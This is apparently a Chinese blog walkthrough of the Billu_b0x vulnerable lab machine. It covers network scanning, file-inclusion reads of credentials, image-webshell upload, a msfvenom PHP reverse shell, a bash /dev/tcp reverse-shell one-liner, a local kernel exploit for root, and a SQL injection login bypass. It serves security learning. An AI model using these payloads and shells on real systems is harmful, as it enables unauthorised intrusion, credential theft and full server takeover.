Billu_b0x这个靶机也是断断续续的才做完,途中遇到了很多不懂的,但是这也表明进步的空间很大,这个靶机很适合我们这种初级的学习者,其中不乏趣味性,也有点难度,但总体思路是清晰的,有兴趣的同学不妨试试。
1.主机发现
arp-scan -l(不会扫描自己)
或者
nmap -sn 192.168.223.0/24 -oG - (不管是不是自己都要扫)
2.端口扫描
nmap -sS 192.168.223.132
或者
nmap -sS -A -Pn -p- -n 192.168.223.132
或者
nmap 192.168.223.0/24
或者
messcan 192.168.223.132 -p 0-65535 --rate=10000(这个命令可能会漏扫,建议多扫几下)
3.扫描目录
dirb http://192.168.223.132
或者
dirb http://192.168.223.132 /usr/share/dirb/wordlists/wordlists/big.txt
我们可以看到爆破出很多目录,而有用的是以下目录:
uploaded_images/
phpmy/
in.php
c.php
/test.php
查看bird爆出来的目录,发现有个test.php,需要传递file参数,
方法一:
首先我们,看到22端口是开放的,那我我们只要得到主机的账号密码就可以成功了
PHP默认配置文件是config.inc.php,Linux系统路径结合phpmy,
文件应在/var/www/phpmy/下:var/www/phpmy/config.inc.php 直接查看账户信息
然后ssh登录
方法二
通过test传参读取实验发现,c.php是数据库的配置文件
$conn = mysqli_connect(“127.0.0.1”,“billu”,“b0x_billu”,“ica_lab”);
那么我们进入phpmyadmin看看,而这里的名字是phpmy,然后填写账号密码进入
查看指定数据库里发现有账号密码,那么可能是首页的账号密码,我们登陆进去看康康
biLLu hEx_it
登陆之后,跳转到一个叫panel.php的页面,发现可以查看用户信息,也可以添加用户信息
很明显这个是可以上传木马的,但是我们先看下我们先代码审计一下,发现有白名单机制,只能上传图片格式,
还有文件包含,
这时候我们就来上传一个图片马,
得到木马上传位置
http://192.168.223.132/uploaded_images/a.jpg
文件包含getshell(连接菜刀)
上传的图片的路径为:
http://192.168.8.129/uploaded_images/a.jpg
用panel.php或者test.php文件,都可以包含这个图片马,但是是以POST访问,而菜刀只能以GET访问,所以菜刀是不能连接这个图片马的
file=uploaded_images/a.jpg
或者
而菜刀只能以GET访问,所以菜刀是不能连接这个图片马的
换个思路
1、在之前图片马的基础上,然后进行写入一句话文件,菜刀连接一句话文件后提权。
2、使用burp执行命令:用POST请求执行cmd命令:POST /panel.php?cmd=cat /etc/passwd
(这里的cat /etc/passwd必须转换成url编码才行,不然看执行失败)
POST的body中包含cmd.jpg图片马:load=/uploaded_images/a.jpg&continue=continue
成功执行命令cat /etc/passwd
上面个命令无所谓,只是为了测试能否成功,
执行cmd命令 ls -la 康康那个目录可写!然后写入(滑稽)
发现了uploaded_images目录可写,在BP或者hackbar中直接以POST方式写一句话到/uploaded_images下的xiao.php
(注:都要把cmd命令换成url编码)
用cat uploaded_images/xiao.php
可以看到已经成功写入一句话木马到xiao.php
(这里其实应该只有一个,因为我只写了一个)
菜刀连接shell.php
路径:http://192.168.223.132/uploaded_images/xiao.php 尼玛:mm
提权
在菜刀的虚拟终端
cat /etc/issue和uname -a
查看系统的版本信息和内核为:Ubuntu 12.04.5 LTS、Linux indishell 3.13.0-32-generic
在kali的searchsploit(漏洞数据库)中搜索这个系统版本的漏洞
searchsploit Ubuntu 12.04
选择相应的linux版本,将exp拷贝下来(这里我是拷贝到root目录下的)
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/
赋予执行权限 chmod 777 37292.c
在kali本机上gcc编译后生成exp gcc 37292.c -o exp
(格式:gcc 文件.c -o 文件,如果不指定文件名,默认生成a.out)
将当前目录下生成的exp用菜刀上传至靶机上直接运行
将当前目录下生成的exp用菜刀上传至靶机上直接运行,屡次提权失败,
不知道原因,既然菜刀都连上了,不妨用kaili生成后门,正好学习一下
看到当前目录通篇都是php环境,很自然想到用msfvenom生成一个php后门,菜刀上传,触发它反弹再提权
生成后门
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.223.134 -f raw >/root/xiaoyuan.php
菜刀上传
开启msf配置好handler:
use exploit/multi/handler
set lhost 192.168.8.253
set payload php/meterpreter/reverse_tcp
run
触发后门
http://192.168.223.132/uploaded_images/xiaoyuan.php
反弹拿到shell,直接运行之前编译好的exp提取、提权成功
方法三
这里跟方法二差不多的,前面都差不多一样,这是拿shell、提权这里不同
所以这里的重复步骤我就文字叙述了
1.端口扫描&目录爆破
2. 2,利用文件包含漏洞
(这2步在方法二中都是有的)
3,shell反弹,root提权 kali命令行里输入nc -lvnp 6666开始监听,同时burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.50.140/6666 0>&1″ | bash,注意要将此命令先经过URL编码才能发送
shell反弹成功,我们还有个root用户一直没有派上用场,直接su -
又是提示需要终端,输入命令 python -c ‘import pty;pty.spawn(“/bin/bash”)’
再重试一下
OK,进入到root目录,成功。
方法四
前面的步骤跟方法二基本一样。
这里是直接首页代码审计,然后sql注入
通过test.php这个特殊的传参读取,我们来看首页的源码(代码审计)
虽然前面使用str_replace( )函数将单引号全部过滤了,但是我们可以在输入pass时,输入一个 \ 符号,将uname逃逸出来。
例如我们输入123/123,这里的查询语句就是:
select * from auth where pass=‘123’ and uname=‘123’
输入pass=123\ uname= or 1=1 --+
其中or 1=1永真,就可以成功绕过。
查询语句就成了:
select * from auth where pass=‘123’ and uname=’ or 1=1 – ’
这里学习了两个函数,顺便记录一下:
(1)file_get_contents(),用于将文件的内容读入到一个字符串中:
成功读取到c.php内容:
(2)scandir( ) 函数返回指定目录中的文件和目录的数组。
之前我们在方法二中已经知道了哪个目录可写,那么我们现在来就写一个一句话木马
尝试对写入内容使用ascii码的方式传入。
编写以下代码将一句话木马转换为ascii码的方式:
后面步骤和上面基本一样,
后面步骤和上面基本一样,
只是一句话木马不一样
转Ascii码
尝试访问config.php,未报错,生成成功:
然后菜刀连接
系统提权:
whoami
id
uname -a
cat /etc/issue